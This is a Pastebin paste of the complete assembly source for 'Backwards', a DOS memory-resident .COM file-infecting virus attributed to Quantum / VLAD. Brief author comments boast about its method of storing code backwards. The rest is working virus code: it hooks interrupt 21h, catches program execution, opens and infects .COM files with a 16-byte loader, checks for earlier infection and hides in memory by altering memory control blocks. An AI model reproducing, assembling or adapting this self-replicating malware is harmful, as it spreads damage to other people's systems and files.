Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;
- ; Backwards by Quantum / VLAD.
- ;
- ; w00p.. this is a standard TSR com infector. Now before you start
- ; screaming that I should go code for YAM with **** like this, I would
- ; like to point out that this virus uses a unique infection method that
- ; reverses the code.
- ;
- ; By pushing everything onto the stack, it reverses the code, that is stored
- ; backwards, and executes it. The loader is 16 bytes long and the original
- ; 16 bytes of the file are stored in the virus code.
- ;
- mov si,offset c
- xor sp,sp
- mov cx,(offset cend - offset c)/2
- loop1:
- lodsw
- xchg ah,al
- push ax
- loop loop1
- jmp sp
- ; rest of the host goes here
- int 20h
- ; virus code goes here .. note: this code is stored backwards!
- ; I suggest you go to the end of the code and read backwards.
- c:
- db 16 dup (90h) ; will always be at FFF0h
- org16bytes:
- db 0e4h,0ffh ; jmp sp
- db $ - offset loaderloop
- db 0e2h ; loop loaderloop
- db 50h ; push ax
- db 0e0, 86h ; xchg ah,al
- db 0adh ; lodsw
- loaderloop:
- db ((offset cend - offset c)/2)/256
- db ((offset cend - offset c)/2) and 255
- db 0b9h ; mov cx,(offset cend - offset c)/2
- db 0e4h,31h ; xor sp,sp
- db 0,0
- wherecodeat:
- db 0beh ; mov si,where the code is at
- loader:
- db "BACKWARDS by Quantum / VLAD"
- db $ - offset goold
- db 0ebh ; jmp goold
- db 58h ; pop ax
- db 5bh ; pop bx
- db 59h ; pop cx
- db 5ah ; pop dx
- db 5eh ; pop si
- db 5fh ; pop di
- db 1fh ; pop ds
- db 07h ; pop es
- db 21h, 0cdh ; int 21h
- db 3eh, 0b4h ; mov ah,3eh
- closefile:
- db 21h, 0cdh ; int 21h
- db (offset cend - offset loader)/ 256
- db (offset cend - offset loader) and 255
- db 0bah ; mov dx,(offset cend - offset loader)
- db 1fh ; pop ds
- db 0eh ; push cs
- db 0, 10h, 0b9h ; mov cx,16
- db 40h, 0b4h ; mov ah,40h
- db 21h, 0cdh ; int 21h
- db 0d2h, 031h ; xor dx,dx
- db 0c9h, 031h ; xor cx,cx
- db 42h,0, 0b8h ; mov ax,4200h
- db 21h, 0cdh ; int 21h
- db (offset cend - offset c) / 256
- db (offset cend - offset c) and 255
- db 0b9h ; mov cx,(offset cend - offset c)
- db 40h, 0b4h ; mov ah,40h
- db 0fah
- db 0e2h ; loop
- db 0aah ; stosb
- db 0fdh ; std
- db 0ach ; lodsb
- db 0fch ; cld
- db 0ffh,0ffh,0beh ; mov si,-1
- db 0cah, 89h ; mov dx,cx
- db (offset cend - offset c)/256
- db (offset cend - offset c) and 255
- db 0b9h ; mov cx,(offset cend - offset c)
- db ((offset cend - offset c)*2)/256
- db ((offset cend - offset c)*2) and 255
- db 0bfh ; mov di,(offset cend - offset c)*2-1
- db (offset cend - offset wherecodeat)/256
- db (offset cend - offset wherecodeat) and 255
- db 0a3h ; mov [offset cend - offset wherecodeat],ax
- db 01h,0,5h ; add ax,0100h
- db 21h, 0cdh ; int 21h
- db 0d2h, 031h ; xor dx,dx
- db 0c9h, 031h ; xor cx,cx
- db 42h, 02h, 0b8h ; mov ax,4202h
- db $ - offset closefile
- db 74h ; jz closefile
- db 0beh
- db (offset cend - offset org16bytes) / 256
- db (offset cend - offset org16bytes) and 255
- db 3eh, 80h ; cmp byte ptr [offset cend - offset org14bytes],0beh
- db $ - offset closefile
- db 74h ; jz closefile
- db "M","Z"
- db (offset cend - offset org16bytes) / 256
- db (offset cend - offset org16bytes) and 255
- db 3eh, 81h ; cmp word ptr [offset cend - offset org16bytes],"ZM"
- db 21h , 0cdh ; int 21h
- db (offset cend - offset org16bytes)/256
- db (offset cend - offset org16bytes) and 255
- db 0bah ; mov dx,offset cend - offset org16bytes
- db 0, 10h, 0b9h ; mov cx,16
- db 3fh, 0b4h ; mov ah,3fh
- db 07h ; pop es
- db 1fh ; pop ds
- db 0eh ; push cs
- db 0eh ; push cs
- db 93h ; xchg bx,ax
- db 21h, 0cdh ; int 21h
- db 3dh,02h,0b8h ; mov ax,3d02h
- db 06h ; push es
- db 1eh ; push ds
- db 57h ; push di
- db 56h ; push si
- db 52h ; push dx
- db 51h ; push cx
- db 53h ; push bx
- db 50h ; push ax
- executing:
- db 0,0,0,0
- oldi21:
- db 0eah
- goold:
- db 5 ; $ - offset executing
- db 74h ; jz executing
- db 4bh,0fch,80h ; cmp ah,4bh
- notserv:
- db 0cfh ; iret
- db $ - offset notserv
- db 75h ; jnz notserv
- db 18h,18h,03dh ; cmp ax,1818h
- newi21:
- db 0e7h, 0ffh ; jmp di
- db (offset cend - offset c)/256
- db (offset cend - offset c) and 255
- db 0c4h, 81h ; add sp,(offset cend - offset c)
- db 5fh ; pop di
- db 0a5h, 0f3h ; rep movsw
- db 0, 8, 0b9h ; mov cx,8
- db 57h ; push di
- db 1, 0, 0bfh ; mov di,0100h
- db 0ffh, 0f0h, 0beh ; mov si,0fff0h
- db 07h ; pop es
- db 1fh ; pop ds
- db 0eh ; push cs
- db 0eh ; push cs
- back2host:
- db 0feh, 44h, 8ch ; mov word ptr [si-2],es
- db (offset cend-offset newi21)/256
- db (offset cend-offset newi21) and 255
- db 0fch, 44h, 0c7h ; mov word ptr [si-4],offset cend-offset newi21
- db 0a5h ; movsw
- db 0a5h ; movsw
- db (offset cend - offset oldi21)/256
- db (offset cend - offset oldi21) and 255
- db 0bfh ; mov di,offset cend - offset oldi21
- db 0, 84h, 0beh ; mov si,84h
- db 0d9h, 8eh ; mov ds,cx
- db 0a5h, 0f3h ; rep movsw
- db (0 - (offset cend - offset c))/256
- db (0 - (offset cend - offset c)) and 255
- db 0beh ; mov si,0 - (offset cend - offset c)
- db ((offset cend - offset c)/2+1)/256
- db ((offset cend - offset c)/2+1) and 255
- db 0b9h ; mov cx,(offset cend - offset c)/2+1
- db 1fh ; pop ds
- db 0eh ; push cs
- db 0c0h, 08eh ; mov es,ax
- db 012h, 45h, 08bh ; mov ax,[di+12h]
- db ((offset cend - offset c)/8+1)/256
- db ((offset cend - offset c)/8+1) and 255
- db 12h, 6dh, 81h ; sub word ptr [di+12h],(offset cend-offset c)/16+1
- db ((offset cend - offset c)/8+1)/256
- db ((offset cend - offset c)/8+1) and 255
- db 3h, 6dh, 81h ; sub word ptr [di+3h],(offset cend-offset c)/16+1
- db $ - offset back2host
- db 75h ; jnz back2host
- db "Z",03dh,80h ; cmp byte ptr [di],"Z"
- db 0ffh, 031h ; xor di,di
- db 0d8h, 8eh ; mov ds,ax
- db 48h ; dec ax
- db 0c0h,8ch ; mov ax,es
- db $ - offset back2host
- db 75h ; jnz back2host
- db 0c0h,08h ; or al,al
- db 21h,0cdh ; int 21h
- db 18h,18h,0b8h ; mov ax,1818h
- cend:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
